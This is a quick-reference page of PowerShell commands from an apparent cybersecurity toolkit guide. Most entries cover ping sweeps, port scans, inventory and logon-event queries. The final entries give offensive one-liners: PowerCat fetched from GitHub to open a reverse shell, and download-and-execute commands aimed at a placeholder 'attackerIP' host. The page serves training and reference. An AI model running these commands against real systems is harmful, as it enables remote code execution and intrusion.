> For the complete documentation index, see [llms.txt](https://doubtfulturnip.gitbook.io/dts-cybersecurity-tool-kit/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://doubtfulturnip.gitbook.io/dts-cybersecurity-tool-kit/guides/quick-reference/powershell.md). # PowerShell Simple **Ping Sweep** ``` 2..254 | Foreach-Object { Test-Connection -ComputerName XXX.XXX.XXX.$_} ``` Each host **scans for its neighbours** ($ComputerList in this instance would refer to a variable created to reference a text file with a list of computer names in it) ``` $Results = Invoke-Command - ComputerName $ComputerList -ScriptBlock { Get-NetNeighbor -AddressFamily IPv4 | Where-Object {$_.LinkLayerAddress -notlike "01-00-5E*" -and $_.LinkLayerAddress -notlike "FF-FF-FF-FF-FF-FF"} } ``` **Software inventory** list (Can be altered to loop through a list of computers as per above) ``` @("HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*","HKLM:\SOFTWARE\Wow6432node\Mircrosoft\Windows\CurrentVersion\Uninstall\*") | ForEach-Object { Get-ItemProperty "$_" | Select-Object DisplayName,PSChildName,Publisher,InstallLocation} ``` Simple TCP **port scan** (IPv4) (1234..5678 refers to port range) ``` $ip = @("XXX.XXX.XXX.XXX","XXX.XXX.XXX.XXX") $ips | ForEach-Object { $ip =$_; 1234..5678 | ForEach-Object { Test-NetConnection -ComputerName $ip -Port $_ -InformationLevel Quiet }} ``` Simple UDP **port scan** (IPv4) ``` $ips = @("XXX.XXX.XXX.XXX","XXX.XXX.XXX.XXX") $ips | ForEach-Object { $ip =$_; $UDP = New-Object System.Net.Sockets.UdpClient ($ip); $UDP.Connect($ip,$_) } ``` Search for **string in file recursively** through folders and provide path of file ``` Get-ChildItem -Recurse | Select-String "dummy" -List | Select Path ``` Get Windows **security events** and group by ID count ``` Get-Winevent -LogName Security | Group-Object -Property Id -NoElement ``` Display all **successful logons** within 24 hours and provide usernames (Ensure TargetWorkstation variable exists) ``` Invoke-Command {Get-WinEvent -FilterHashTable @{LogName="Security";Id=4624;StartTime=$((Get-Date).AddDays(-1))} | ForEach-Object {$e=[xml]$_.ToXml();$e.Event.EventData.Data[5]} | Select-Object -ExpandProperty "#text" | Group-Object -NoElement } -ComputerName $TargetWorkstation ``` Active Directory - Search for **last logon date** of specified user ```bash Get-ADUser -Identity username -Properties "LastLogonDate" ``` Find all local users who have **logged in** during the last 10 days (adjust (-10) to change days) ```bash Get-LocalUser | Where-Object {$_.Lastlogon -ge (Get-Date).AddDays(-10)} | Select-Object Name,Enabled,SID,Lastlogon | Format-List ``` Method for discovering accounts **logged into the most systems** across the network by count (Ensure Workstations variable exists) ``` Invoke-Command {Get-WinEvent -FilterHashTable @{LogName="Security";Id=4624} | ForEach-Object {$e=[xml]$_.ToXml();$e.Event.EventData.Data[5]} | Select-Object -ExpandProperty "#text" | Group-Object | Sort-Object -Property Count -Descending} -ComputerName $Workstations | Select-Object -Property Name | Sort-Object -Descending -Property Count ``` Detect **randomness of filename**s within given directory. (See also, [Security Tools List](/dts-cybersecurity-tool-kit/tools-list/security-tools-list.md) for the Freq-PS script required for this command). Method for finding malicious files with random names. ```aspnet . C:\Scripts\freq.ps1 #Location of freq.ps1 script Get-ChildItem | Get-FrequencyScore -Property Name | Select-Object -Property Name,FrequencyScore | Sort-Object -Property FrequencyScore -Unique ``` Downloading **PowerCat** from GitHub, then using it to open a connection to a remote server ```bash IEX (New-Object System.Net.Webclient).DownloadString ('https://raw.githubusercontent.com/besmorhino/powercat/master/powercat.ps1'); powercat -c -p -e powershell ``` The following will download and store a remote file to disk. ``` Invoke-WebRequest -Uri "http://attackerIP/file.exe" -OutFile "C:\path\to\file.exe" ``` The following will download and automatically execute the remote PowerShell script when ran from a command prompt. ``` powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://attackerIP/file.ps1')“ ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://doubtfulturnip.gitbook.io/dts-cybersecurity-tool-kit/guides/quick-reference/powershell.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.